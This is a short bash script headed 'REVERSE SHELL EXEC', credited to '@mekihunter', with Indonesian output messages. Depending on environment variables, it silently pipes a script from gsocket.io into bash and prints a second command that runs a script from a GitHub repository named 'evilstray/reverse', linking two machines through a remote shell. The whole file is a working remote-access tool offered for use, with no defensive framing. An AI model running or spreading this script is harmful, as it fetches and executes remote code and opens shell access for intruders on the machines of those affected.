BLUE="\033[0;34m"
RED="\033[0;31m"
RESET="\033[0m"

echo -e "$BLUE ##  REVERSE SHELL EXEC  ##
 ## Author : @mekihunter ##$RESET
"

# Check if $API is set
if [ -z "$API" ]; then
  :
else
  X="mekihunter_$API" bash -c "$(curl -fsSL https://gsocket.io/x)" > /dev/null 2>&1
  echo "Silahkan jalankan command berikut ini pada VPS Anda : "
  echo 'FROM_API="$API" bash -c "$(curl -fsSL https://raw.githubusercontent.com/evilstray/reverse/refs/heads/main/dx"'
fi

# Check if $FROM_API is set
if [ -z "$FROM_API" ]; then
  :
else
  S="mekihunter_$FROM_API" bash -c "$(curl -fsSL https://gsocket.io/x)"
  echo "Berhasil: Terhubung ke shell!"
fi
